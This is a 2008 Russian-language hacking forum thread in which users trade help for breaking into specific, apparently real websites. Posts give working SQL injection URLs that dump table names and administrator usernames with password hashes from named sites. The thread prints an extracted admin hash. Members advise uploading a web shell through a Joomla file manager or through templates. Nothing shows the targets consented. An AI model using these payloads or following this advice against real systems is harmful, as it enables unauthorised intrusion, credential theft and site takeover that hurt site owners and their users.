21.08.2008, 03:48
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
С нами:
9420866
Репутация:
228
|
|
Сообщение от truelamer
Всем прива!
Тема актуальная! Подскажите пожалуйста чем можно по joomla по каталогам шарить я для этого использую joomla xplorer, что есть еще мож что по лучше))))
Если ты суперадмин, то можешь залить шелл через joomla xplorer (в папку images можешь сразу лить, т.к. там права 777 стоят) и потом гуляй по директориям 
|
|
|
20.08.2008, 18:35
|
|
Новичок
Регистрация: 18.08.2008
Сообщений: 5
С нами:
9331623
Репутация:
3
|
|
Помогите заюзать скюль инекцию и вытащить пас админа
|
|
|
|
20.08.2008, 18:36
|
|
Новичок
Регистрация: 18.08.2008
Сообщений: 5
С нами:
9331623
Репутация:
3
|
|
тему я создал, но там никто не помог
|
|
|
|
20.08.2008, 19:15
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
С нами:
9742875
Репутация:
81
|
|
http://release.master.dcms.su/info.php?id=1
$id=intval($anket);
имхо скулы нет, intval() - переводит в число без точки так что только числа а ими скулу не сделаешь)
Последний раз редактировалось truelamer; 20.08.2008 в 19:20..
|
|
|
|
22.08.2008, 02:06
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
С нами:
9326973
Репутация:
-25
|
|
Вопрос как моно воспользоваться вот этим?
http://rk-triada.ru//d8cms/admin_themes/
И где моно найти ифу про cms nextweb и её уязвимости ,,??
Ивобще у этого сайта http://rk-triada.ru/ что нет уязвимости??? Лично я проверил вроде на все что знаю!
(заранее спасибо)
Последний раз редактировалось geforce; 22.08.2008 в 03:08..
|
|
|
|
22.08.2008, 02:56
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами:
10024314
Репутация:
739
|
|
никак,просто права на диру не правильно стоят
|
|
|
|
22.08.2008, 03:18
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
С нами:
9326973
Репутация:
-25
|
|
Есть такой сайт http://www.modvlad.ru/
зделал такое http://www.modvlad.ru/photo/?g=-1+union+select+111,222,username,user_password,555, 666+from+forum_users+limit+0.1/*
но это только дял форума! как посмотреть всё что есть в базе? И моно залить туду шелл? И если моно то как?
|
|
|
|
22.08.2008, 03:40
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
geforce
вот так смотри все таблы..
http://www.modvlad.ru/photo/?g=-1+union+select+1,2,3,4,table_name,6+from+informati on_schema.tables/*
вот правельная база от форума..
http://www.modvlad.ru/photo/?g=-1+union+select+111,222,333,444,concat_ws(0x3a,user name,user_password),666+from+phpbb3_users+where+us er_id=2/*
Administrator:$H$9uIjBNujsrtCkk2HuMQPADk9w.i4Mr/
осталось разшифровать.. и залить шелл через темплейты)
|
|
|
|
22.08.2008, 05:53
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
С нами:
9326973
Репутация:
-25
|
|
А вот деся как мне залить shell???
http://wow.alania.net/gilds.php?guid=-3+union+select+1,concat_ws(0x3a,username,sha_pass_ hash),3,4,5,6,7,8,9,10,11,12+from+realmd.account+l imit+4,1/*
Последний раз редактировалось geforce; 22.08.2008 в 06:31..
|
|
|
|
22.08.2008, 06:25
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
geforce
если есть пасс от админки то разшифруй... и войди в место входа)) а потом уже смотри Залить или не Залить )
Последний раз редактировалось sabe; 22.08.2008 в 07:25..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
